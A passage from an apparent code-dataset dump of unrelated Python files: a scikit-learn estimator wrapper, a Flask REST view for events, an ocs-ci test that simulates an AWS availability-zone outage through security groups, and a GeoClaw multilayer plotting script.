Name of the column which will be used for sorting if X is a
dataframe and has the column.
estimator_kwargs: dict
Keyword arguments to initialize EstimatorClass
E.g.:
> StepsSelectorEstimator(RandomForestRegressor(), 100)
"""
if estimator_kwargs is None:
estimator_kwargs = {}
self.amount_of_steps = amount_of_steps
self.sort_col = sort_col
self.estimator_kwargs = estimator_kwargs
self.estimator_class = Classer.from_obj(estimator_class)
self._estimator = self.estimator_class.new(**self.estimator_kwargs)
def fit(self, X, y):
"""Fits self.estimator only to the last self.amount_of_steps rows.
Tries to sort X first.
Parameters
----------
X: pd.DataFrame
A dataframe to fit.
y: vector like
Labels
"""
if self.sort_col in X.columns:
X = X.sort_values(self.sort_col, axis=0)
index_to_drop = X.iloc[: -self.amount_of_steps].index
y = y.drop(index_to_drop).reset_index(drop=True)
X = X.drop(index_to_drop).reset_index(drop=True)
self._estimator.fit(X, y)
return self
def predict(self, X):
"""Scikit's learn like predict."""
return self._estimator.predict(X)
def get_params(self, deep=True):
"""Get estimator params."""
kwargs = self.estimator_kwargs
if deep:
kwargs = deepcopy(kwargs)
return {
'estimator_class': self.estimator_class,
'amount_of_steps': self.amount_of_steps,
'sort_col': self.sort_col,
'estimator_kwargs': kwargs,
}
def set_params(self, **params):
"""Sets the estimator's params to \*\*params.""" # pylint: disable=anomalous-backslash-in-string
self.estimator_class = Classer.from_obj(params['estimator_class'])
self.amount_of_steps = params['amount_of_steps']
self.sort_col = params['sort_col']
self.estimator_kwargs = params['estimator_kwargs']
self._estimator = self.estimator_class.new(**self.estimator_kwargs)
return self
def __repr__(self): # pylint: disable=signature-differs
"""Text representation of the object to look it nicely in the
interpreter.
"""
return (
f'{self.__class__.__name__}('
f'estimator_class={Classer.from_obj(self.estimator_class)}, '
f'amount_of_steps={self.amount_of_steps}, '
f'estimator_kwargs={self.estimator_kwargs})'
)
__str__ = __repr__
class Classer:
def __init__(self, EstimatorClass):
"""Wraps an EstimatorClass to avoid sklearn.base.clone exploting when
called against an EstimatorClass during grid search of metaestimators.
Parameters
----------
EstimatorClass: class
A Sklearn compatible estimator class.
"""
self._class = EstimatorClass
def new(self, *args, **kwargs):
"""Returns a new instance of the wrapped class initialized with the
args and kwargs.
"""
return self._class(*args, **kwargs)
@classmethod
def from_obj(cls, obj):
"""Initializes a new classer from an object, which can be another
Classer, a class or an instance.
"""
if isinstance(obj, Classer):
return obj
elif isclass(obj):
return Classer(obj)
else:
return Classer(obj.__class__)
def __eq__(self, other):
"""Equality checks inner class wrapped."""
return self.__class__ == other.__class__ and self._class == other._class
def __repr__(self):
"""Text representation of the object to look it nicely in the
interpreter.
"""
return f'{self.__class__.__name__}({self._class.__name__})'
__str__ = __repr__
| 0.847274 | 0.396944 |
from datetime import timedelta
from webargs import fields
from . import BaseView, use_args, use_kwargs
from ..models.event import Event as EventModel
from ..schemas.event import Event as EventSchema, EventMatch
from .utils import get_or_404
eventlist_args = {
"fromdate": fields.Date(required=False),
"todate": fields.Date(required=False),
}
class EventListView(BaseView):
# pylint: disable=no-self-use
route_base = "/events"
@use_kwargs(eventlist_args, location="query")
def get(self, fromdate, todate):
if fromdate and todate:
matches = EventModel.get_between(fromdate, todate)
return EventMatch.jsonify(matches), 200
objects = EventModel.query_all().all()
return EventSchema.jsonify(objects), 200
@use_args(EventSchema(), location="json")
def post(self, args):
obj = EventModel.create(**args)
return EventSchema.jsonify(obj), 201
class EventItemView(BaseView):
# pylint: disable=no-self-use
route_base = "/events/<int:id>"
def get(self, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
return EventSchema.jsonify(obj), 200
@use_args(EventSchema(), location="json")
def put(self, args, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
obj.update(**args)
return EventSchema.jsonify(obj), 200
def delete(self, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
obj.delete()
return "", 204
repeat_args = {
"days": fields.Int(required=True),
}
class EventRepeatView(BaseView):
# pylint: disable=no-self-use
route_base = "/events/<int:id>/repeat"
@use_kwargs(repeat_args, location="json")
def post(self, id, days): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
if obj.repeat is not None:
return "", 400
dt = obj.date + timedelta(days=days)
new_obj = EventModel.create(name=obj.name, icon=obj.icon, date=dt)
return EventSchema.jsonify(new_obj), 201
|
friday/views/event.py
|
from datetime import timedelta
from webargs import fields
from . import BaseView, use_args, use_kwargs
from ..models.event import Event as EventModel
from ..schemas.event import Event as EventSchema, EventMatch
from .utils import get_or_404
eventlist_args = {
"fromdate": fields.Date(required=False),
"todate": fields.Date(required=False),
}
class EventListView(BaseView):
# pylint: disable=no-self-use
route_base = "/events"
@use_kwargs(eventlist_args, location="query")
def get(self, fromdate, todate):
if fromdate and todate:
matches = EventModel.get_between(fromdate, todate)
return EventMatch.jsonify(matches), 200
objects = EventModel.query_all().all()
return EventSchema.jsonify(objects), 200
@use_args(EventSchema(), location="json")
def post(self, args):
obj = EventModel.create(**args)
return EventSchema.jsonify(obj), 201
class EventItemView(BaseView):
# pylint: disable=no-self-use
route_base = "/events/<int:id>"
def get(self, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
return EventSchema.jsonify(obj), 200
@use_args(EventSchema(), location="json")
def put(self, args, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
obj.update(**args)
return EventSchema.jsonify(obj), 200
def delete(self, id): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
obj.delete()
return "", 204
repeat_args = {
"days": fields.Int(required=True),
}
class EventRepeatView(BaseView):
# pylint: disable=no-self-use
route_base = "/events/<int:id>/repeat"
@use_kwargs(repeat_args, location="json")
def post(self, id, days): # pylint: disable=redefined-builtin
obj = get_or_404(EventModel, id)
if obj.repeat is not None:
return "", 400
dt = obj.date + timedelta(days=days)
new_obj = EventModel.create(name=obj.name, icon=obj.icon, date=dt)
return EventSchema.jsonify(new_obj), 201
| 0.610337 | 0.070688 |
import logging
import random
import pytest
from ocs_ci.framework.pytest_customization.marks import aws_platform_required
from ocs_ci.framework.testlib import ManageTest, tier4, bugzilla
from ocs_ci.ocs.exceptions import CommandFailed
from tests import sanity_helpers
logger = logging.getLogger(__name__)
@tier4
@pytest.mark.polarion_id("OCS-1287")
@aws_platform_required
@bugzilla('1754287')
class TestAvailabilityZones(ManageTest):
"""
test availability zone failure:
test stages:
1. Select availability zone
2. In this availability zone, backup instances original security groups
3. block availability zone by attaching security group with no permissions
4. validate - cluster functionality and health
2a. health check - warning or error
2b. create cephfs, create rbd, create pvc (validate_cluster)
5. restore availability zone access
6. validate - cluster functionality and health
"""
@pytest.fixture(autouse=True)
def init_sanity(self):
"""
init Sanity() object
"""
self.sanity_helpers = sanity_helpers.Sanity()
@pytest.fixture()
def teardown(self, request, ec2_instances, aws_obj):
def finalizer():
current_sg = aws_obj.store_security_groups_for_instances(self.instances_in_az)
if self.original_sgs != current_sg:
aws_obj.restore_instances_access(self.security_group_id, self.original_sgs)
logger.info(f"Access to EC2 instances {self.instances_in_az} has been restored")
if self.security_group_id in aws_obj.get_all_security_groups():
logger.info(f"Deleting: {self.security_group_id}")
aws_obj.delete_security_group(self.security_group_id)
request.addfinalizer(finalizer)
def test_availability_zone_failure(
self, aws_obj, ec2_instances, pvc_factory, pod_factory, teardown
):
"""
Simulate AWS availability zone failure
"""
# Select instances in randomly chosen availability zone:
self.instances_in_az = self.random_availability_zone_selector(aws_obj, ec2_instances)
logger.info(f"AZ selected, Instances: {self.instances_in_az} to be blocked")
# Storing current security groups for selected instances:
self.original_sgs = aws_obj.store_security_groups_for_instances(self.instances_in_az)
logger.info(f"Original security groups of selected instances: {self.original_sgs}")
# Blocking instances:
self.security_group_id = self.block_aws_availability_zone(aws_obj, self.instances_in_az)
logger.info(f"Access to EC2 instances {self.instances_in_az} has been blocked")
# Check cluster's health, need to be unhealthy at that point
assert not self.check_cluster_health(), (
"Cluster is wrongly reported as healthy."
"EC2 Instances {self.instances_in_az} are blocked"
)
# Create resources
logger.info("Trying to create resources on un-healthy cluster")
self.sanity_helpers.create_resources(pvc_factory, pod_factory)
logger.info("Resources Created")
# Delete resources
logger.info("Trying to delete resources on un-healthy cluster")
self.sanity_helpers.delete_resources()
logger.info("Resources Deleted")
# Restore access for blocked instances
aws_obj.restore_instances_access(self.security_group_id, self.original_sgs)
logger.info(f"Access restores")
# Check cluster's health, need to be healthy at that point
assert self.check_cluster_health(), "Cluster is unhealthy"
def random_availability_zone_selector(self, aws_obj, ec2_instances):
"""
Get all instances within random availability zone
Args:
aws_obj (obj): aws.AWS() object
ec2_instances (dict): cluster ec2 instances objects
Returns:
list: instances_in_az
"""
random_az_selector = random.choice(list(ec2_instances.keys()))
random_az_selected = aws_obj.get_availability_zone_id_by_instance_id(random_az_selector)
instances_in_az = list()
for instance in ec2_instances.keys():
az = aws_obj.get_availability_zone_id_by_instance_id(instance)
if random_az_selected == az:
instances_in_az.append(instance)
return instances_in_az
def block_aws_availability_zone(self, aws_obj, instances_in_az):
"""
1. get vpc_id
2. create security group in this vpc
3. block availability zone by using "append_security_group"
Args:
aws_obj (obj): aws.AWS() object
instances_in_az (list): ec2_instances within selected availability zone
Returns:
security_group_id (str): Newly created security id without access permissions
"""
group_name = "TEST_SEC_GROUP"
dict_permissions = {'IpProtocol': 'tcp',
'FromPort': 80,
'ToPort': 80,
'IpRanges': [{'CidrIp': '1.1.1.1/32'}]}
vpc_id = aws_obj.get_vpc_id_by_instance_id(instances_in_az[0])
security_group_id = aws_obj.create_security_group(group_name, dict_permissions, vpc_id)
aws_obj.block_instances_access(security_group_id, instances_in_az)
return security_group_id
def check_cluster_health(self):
try:
self.sanity_helpers.health_check()
return True
except CommandFailed as e:
if "Unable to connect to the server" in str(e):
logger.warning(f"{e}, Cluster is not healthy")
return False
|
tests/manage/cluster/nodes/test_az_failure.py
|
import logging
import random
import pytest
from ocs_ci.framework.pytest_customization.marks import aws_platform_required
from ocs_ci.framework.testlib import ManageTest, tier4, bugzilla
from ocs_ci.ocs.exceptions import CommandFailed
from tests import sanity_helpers
logger = logging.getLogger(__name__)
@tier4
@pytest.mark.polarion_id("OCS-1287")
@aws_platform_required
@bugzilla('1754287')
class TestAvailabilityZones(ManageTest):
"""
test availability zone failure:
test stages:
1. Select availability zone
2. In this availability zone, backup instances original security groups
3. block availability zone by attaching security group with no permissions
4. validate - cluster functionality and health
2a. health check - warning or error
2b. create cephfs, create rbd, create pvc (validate_cluster)
5. restore availability zone access
6. validate - cluster functionality and health
"""
@pytest.fixture(autouse=True)
def init_sanity(self):
"""
init Sanity() object
"""
self.sanity_helpers = sanity_helpers.Sanity()
@pytest.fixture()
def teardown(self, request, ec2_instances, aws_obj):
def finalizer():
current_sg = aws_obj.store_security_groups_for_instances(self.instances_in_az)
if self.original_sgs != current_sg:
aws_obj.restore_instances_access(self.security_group_id, self.original_sgs)
logger.info(f"Access to EC2 instances {self.instances_in_az} has been restored")
if self.security_group_id in aws_obj.get_all_security_groups():
logger.info(f"Deleting: {self.security_group_id}")
aws_obj.delete_security_group(self.security_group_id)
request.addfinalizer(finalizer)
def test_availability_zone_failure(
self, aws_obj, ec2_instances, pvc_factory, pod_factory, teardown
):
"""
Simulate AWS availability zone failure
"""
# Select instances in randomly chosen availability zone:
self.instances_in_az = self.random_availability_zone_selector(aws_obj, ec2_instances)
logger.info(f"AZ selected, Instances: {self.instances_in_az} to be blocked")
# Storing current security groups for selected instances:
self.original_sgs = aws_obj.store_security_groups_for_instances(self.instances_in_az)
logger.info(f"Original security groups of selected instances: {self.original_sgs}")
# Blocking instances:
self.security_group_id = self.block_aws_availability_zone(aws_obj, self.instances_in_az)
logger.info(f"Access to EC2 instances {self.instances_in_az} has been blocked")
# Check cluster's health, need to be unhealthy at that point
assert not self.check_cluster_health(), (
"Cluster is wrongly reported as healthy."
"EC2 Instances {self.instances_in_az} are blocked"
)
# Create resources
logger.info("Trying to create resources on un-healthy cluster")
self.sanity_helpers.create_resources(pvc_factory, pod_factory)
logger.info("Resources Created")
# Delete resources
logger.info("Trying to delete resources on un-healthy cluster")
self.sanity_helpers.delete_resources()
logger.info("Resources Deleted")
# Restore access for blocked instances
aws_obj.restore_instances_access(self.security_group_id, self.original_sgs)
logger.info(f"Access restores")
# Check cluster's health, need to be healthy at that point
assert self.check_cluster_health(), "Cluster is unhealthy"
def random_availability_zone_selector(self, aws_obj, ec2_instances):
"""
Get all instances within random availability zone
Args:
aws_obj (obj): aws.AWS() object
ec2_instances (dict): cluster ec2 instances objects
Returns:
list: instances_in_az
"""
random_az_selector = random.choice(list(ec2_instances.keys()))
random_az_selected = aws_obj.get_availability_zone_id_by_instance_id(random_az_selector)
instances_in_az = list()
for instance in ec2_instances.keys():
az = aws_obj.get_availability_zone_id_by_instance_id(instance)
if random_az_selected == az:
instances_in_az.append(instance)
return instances_in_az
def block_aws_availability_zone(self, aws_obj, instances_in_az):
"""
1. get vpc_id
2. create security group in this vpc
3. block availability zone by using "append_security_group"
Args:
aws_obj (obj): aws.AWS() object
instances_in_az (list): ec2_instances within selected availability zone
Returns:
security_group_id (str): Newly created security id without access permissions
"""
group_name = "TEST_SEC_GROUP"
dict_permissions = {'IpProtocol': 'tcp',
'FromPort': 80,
'ToPort': 80,
'IpRanges': [{'CidrIp': '1.1.1.1/32'}]}
vpc_id = aws_obj.get_vpc_id_by_instance_id(instances_in_az[0])
security_group_id = aws_obj.create_security_group(group_name, dict_permissions, vpc_id)
aws_obj.block_instances_access(security_group_id, instances_in_az)
return security_group_id
def check_cluster_health(self):
try:
self.sanity_helpers.health_check()
return True
except CommandFailed as e:
if "Unable to connect to the server" in str(e):
logger.warning(f"{e}, Cluster is not healthy")
return False
| 0.619932 | 0.290591 |
from __future__ import absolute_import
from __future__ import print_function
import os
import numpy as np
import matplotlib.pyplot as plt
from clawpack.visclaw import geoplot, gaugetools
import clawpack.clawutil.data as clawutil
import clawpack.amrclaw.data as amrclaw
import clawpack.geoclaw.data
import clawpack.geoclaw.multilayer.plot as ml_plot
def setplot(plotdata=None, bathy_location=0.15, bathy_angle=0.0,
bathy_left=-1.0, bathy_right=-0.2):
"""Setup the plotting data objects.
Input: plotdata, an instance of pyclaw.plotters.data.ClawPlotData.
Output: a modified version of plotdata.
returns plotdata object
"""
if plotdata is None:
from clawpack.visclaw.data import ClawPlotData
plotdata = ClawPlotData()
# Load data from output
clawdata = clawutil.ClawInputData(2)
clawdata.read(os.path.join(plotdata.outdir, 'claw.data'))
multilayer_data = clawpack.geoclaw.data.MultilayerData()
multilayer_data.read(os.path.join(plotdata.outdir, 'multilayer.data'))
def transform_c2p(x, y, x0, y0, theta):
return ((x+x0)*np.cos(theta) - (y+y0)*np.sin(theta),
(x+x0)*np.sin(theta) + (y+y0)*np.cos(theta))
def transform_p2c(x, y, x0, y0, theta):
return (x*np.cos(theta) + y*np.sin(theta) - x0,
-x*np.sin(theta) + y*np.cos(theta) - y0)
# Setup bathymetry reference lines
with open(os.path.join(plotdata.outdir, "bathy_geometry.data"), 'r') \
as bathy_geometry_file:
bathy_location = float(bathy_geometry_file.readline())
bathy_angle = float(bathy_geometry_file.readline())
x = [0.0, 0.0]
y = [0.0, 1.0]
x1, y1 = transform_c2p(x[0], y[0], bathy_location, 0.0, bathy_angle)
x2, y2 = transform_c2p(x[1], y[1], bathy_location, 0.0, bathy_angle)
if abs(x1 - x2) < 10**-3:
x = [x1, x1]
y = [clawdata.lower[1], clawdata.upper[1]]
else:
m = (y1 - y2) / (x1 - x2)
x[0] = (clawdata.lower[1] - y1) / m + x1
y[0] = clawdata.lower[1]
x[1] = (clawdata.upper[1] - y1) / m + x1
y[1] = clawdata.upper[1]
ref_lines = [((x[0], y[0]), (x[1], y[1]))]
plotdata.clearfigures()
plotdata.save_frames = False
# ========================================================================
# Generic helper functions
def pcolor_afteraxes(current_data):
bathy_ref_lines(current_data)
def contour_afteraxes(current_data):
axes = plt.gca()
pos = -80.0 * (23e3 / 180) + 500e3 - 5e3
axes.plot([pos, pos], [-300e3, 300e3], 'b',
[pos-5e3, pos-5e3], [-300e3, 300e3], 'y')
wind_contours(current_data)
bathy_ref_lines(current_data)
def profile_afteraxes(current_data):
pass
def bathy_ref_lines(current_data):
axes = plt.gca()
for ref_line in ref_lines:
x1 = ref_line[0][0]
y1 = ref_line[0][1]
x2 = ref_line[1][0]
y2 = ref_line[1][1]
axes.plot([x1, x2], [y1, y2], 'y--', linewidth=1)
# ========================================================================
# Axis limits
xlimits = [-0.5, 0.5]
ylimits = [-0.5, 0.5]
eta = [multilayer_data.eta[0], multilayer_data.eta[1]]
top_surface_limits = [eta[0] - 0.03, eta[0] + 0.03]
internal_surface_limits = [eta[1] - 0.015, eta[1] + 0.015]
top_speed_limits = [0.0, 0.1]
internal_speed_limits = [0.0, 0.03]
# ========================================================================
# Surface Elevations
plotfigure = plotdata.new_plotfigure(name='Surface')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_surface_elevation(plotaxes,1,bounds=top_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,1,bounds=[-0.06,0.06])
# ml_plot.add_surface_elevation(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# ml_plot.add_surface_elevation(plotaxes,2,bounds=[-300-0.5,-300+0.5])
ml_plot.add_surface_elevation(plotaxes,2,bounds=internal_surface_limits)
# ml_plot.add_surface_elevation(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Depths
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='Depths', figno=42)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Layer Depth'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,1,bounds=[-0.1,1.1])
ml_plot.add_land(plotaxes, 1)
# Bottom surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Bottom Layer Depth'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_layer_depth(plotaxes,2,bounds=[-0.1,0.7])
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Water Speed
plotfigure = plotdata.new_plotfigure(name='speed')
plotfigure.show = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Top layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Top Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.afteraxes = pcolor_afteraxes
ml_plot.add_speed(plotaxes, 1, bounds=top_speed_limits)
ml_plot.add_land(plotaxes, 1)
# Bottom layer speed
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Currents - Bottom Layer'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_speed(plotaxes,2,bounds=[0.0,1e-10])
ml_plot.add_speed(plotaxes,2,bounds=internal_speed_limits)
# add_speed(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# Individual components
plotfigure = plotdata.new_plotfigure(name='speed_components',figno=401)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,14)}
# Top layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,1)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,1,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Top Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,2)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,1,bounds=[-0.000125,0.000125])
ml_plot.add_y_velocity(plotaxes,1)
ml_plot.add_land(plotaxes, 1)
# Bottom layer
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "X-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,3)'
plotaxes.afteraxes = pcolor_afteraxes
# add_x_velocity(plotaxes,2,bounds=[-1e-10,1e-10])
ml_plot.add_x_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = "Y-Velocity - Bottom Layer"
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.axescmd = 'subplot(2,2,4)'
plotaxes.afteraxes = pcolor_afteraxes
# add_y_velocity(plotaxes,2,bounds=[-0.8e-6,.8e-6])
ml_plot.add_y_velocity(plotaxes,2)
ml_plot.add_land(plotaxes, 2)
# ========================================================================
# Profile Plots
# Note that these are not currently plotted by default - set
# `plotfigure.show = True` is you want this to be plotted
plotfigure = plotdata.new_plotfigure(name='profile')
plotfigure.show = False
# Top surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = [-1.1, 0.1]
plotaxes.title = "Profile of depth"
plotaxes.afteraxes = profile_afteraxes
slice_index = 30
# Internal surface
def bathy_profile(current_data):
return current_data.x[:, slice_index], b(current_data)[:, slice_index]
def lower_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta2(current_data)[slice_index, :]
def upper_surface(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
eta1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
eta1(current_data)[slice_index, :]
def top_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u1(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u1(current_data)[slice_index, :]
def bottom_speed(current_data):
if multilayer_data.init_type == 2:
return current_data.x[:, slice_index], \
water_u2(current_data)[:, slice_index]
elif multilayer_data.init_type == 6:
return current_data.y[slice_index, :], \
water_u2(current_data)[slice_index, :]
# Bathy
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = bathy_profile
plotitem.plot_var = 0
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'k'
plotitem.show = True
# Internal Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = lower_surface
plotitem.plot_var = 7
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = 'b'
plotitem.show = True
# Upper Interface
plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')
plotitem.map_2d_to_1d = upper_surface
plotitem.plot_var = 6
plotitem.amr_plotstyle = ['-', '+', 'x']
plotitem.color = (0.2, 0.8, 1.0)
plotitem.show = True
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Y-Velocity'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = pcolor_afteraxes
# Water
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# # plotitem.plot_var = geoplot.surface
# plotitem.plot_var = water_v
# plotitem.pcolor_cmap = colormaps.make_colormap({1.0:'r',0.5:'w',0.0:'b'})
# # plotitem.pcolor_cmin = -1.e-10
# # plotitem.pcolor_cmax = 1.e-10
# # plotitem.pcolor_cmin = -2.5 # -3.0
# # plotitem.pcolor_cmax = 2.5 # 3.0
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1,1,1]
# Land
ml_plot.add_land(plotaxes, 1)
# ========================================================================
# Contour plot for surface
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_surface',figno=15)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
# Top Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Top Surface'
plotaxes.axescmd = 'subplot(1,2,1)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=1,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 1, plot_type='contour')
# Internal Surface
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Internal Surface'
plotaxes.axescmd = 'subplot(1,2,2)'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
ml_plot.add_surface_elevation(plotaxes,plot_type='contour',surface=2,bounds=[-2.5,-1.5,-0.5,0.5,1.5,2.5])
ml_plot.add_land(plotaxes, 2, plot_type='contour')
# ========================================================================
# Contour plot for speed
# ========================================================================
plotfigure = plotdata.new_plotfigure(name='contour_speed',figno=16)
plotfigure.show = False
plotfigure.kwargs = {'figsize':(14,4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.title = 'Current'
plotaxes.scaled = True
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.afteraxes = contour_afteraxes
# Surface
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = ml_plot.water_speed_depth_ave
plotitem.kwargs = {'linewidths':1}
# plotitem.contour_levels = [1.0,2.0,3.0,4.0,5.0,6.0]
plotitem.contour_levels = [0.5,1.5,3,4.5,6.0]
plotitem.amr_contour_show = [1,1,1]
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
plotitem.amr_contour_colors = 'k'
# plotitem.amr_contour_colors = ['r','k','b'] # color on each level
# plotitem.amr_grid_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.show = True
# Land
plotitem = plotaxes.new_plotitem(plot_type='2d_contour')
plotitem.plot_var = geoplot.land
plotitem.contour_nlevels = 40
plotitem.contour_min = 0.0
plotitem.contour_max = 100.0
plotitem.amr_contour_colors = ['g'] # color on each level
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = 0
plotitem.amr_patchedges_show = 0
plotitem.show = True
# ========================================================================
# Grid Cells
# ========================================================================
# Figure for grid cells
plotfigure = plotdata.new_plotfigure(name='cells', figno=2)
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.xlimits = xlimits
plotaxes.ylimits = ylimits
plotaxes.title = 'Grid patches'
plotaxes.scaled = True
# Set up for item on these axes:
plotitem = plotaxes.new_plotitem(plot_type='2d_patch')
plotitem.amr_patch_bgcolor = ['#ffeeee', '#eeeeff', '#eeffee']
plotitem.amr_celledges_show = [0,0,0]
plotitem.amr_patchedges_show = [1,1,1]
# ========================================================================
# Vorticity Plot
# ========================================================================
# plotfigure = plotdata.new_plotfigure(name='vorticity',figno=17)
# plotfigure.show = False
# plotaxes = plotfigure.new_plotaxes()
# plotaxes.title = "Vorticity"
# plotaxes.scaled = True
# plotaxes.xlimits = xlimits
# plotaxes.ylimits = ylimits
# plotaxes.afteraxes = pcolor_afteraxes
#
# # Vorticity
# plotitem = plotaxes.new_plotitem(plot_type='2d_imshow')
# plotitem.plot_var = 9
# plotitem.imshow_cmap = plt.get_cmap('PRGn')
# # plotitem.pcolor_cmap = plt.get_cmap('PuBu')
# # plotitem.pcolor_cmin = 0.0
# # plotitem.pcolor_cmax = 6.0
# plotitem.imshow_cmin = -1.e-2
# plotitem.imshow_cmax = 1.e-2
# plotitem.add_colorbar = True
# plotitem.amr_celledges_show = [0,0,0]
# plotitem.amr_patchedges_show = [1]
#
# # Land
# plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')
# plotitem.plot_var = geoplot.land
# plotitem.pcolor_cmap = geoplot.land_colors
# plotitem.pcolor_cmin = 0.0
# plotitem.pcolor_cmax = 80.0
# plotitem.add_colorbar = False
# plotitem.amr_celledges_show = [0,0,0]
# ========================================================================
# Figures for gauges
# Top
plotfigure = plotdata.new_plotfigure(name='Surface & topo',
type='each_gauge',
figno=301)
plotfigure.show = True
plotfigure.clf_each_gauge = True
plotfigure.kwargs = {'figsize': (14, 4)}
# Set up for axes in this figure:
plotaxes = plotfigure.new_plotaxes()
plotaxes.axescmd = 'subplot(1, 2, 1)'
plotaxes.xlimits = [0.0, 1.0]
plotaxes.ylimits = top_surface_limits
plotaxes.title = 'Top Surface'
# Plot surface as blue curve:
plotitem = plotaxes.new_plotitem(plot_type='1d_plot')
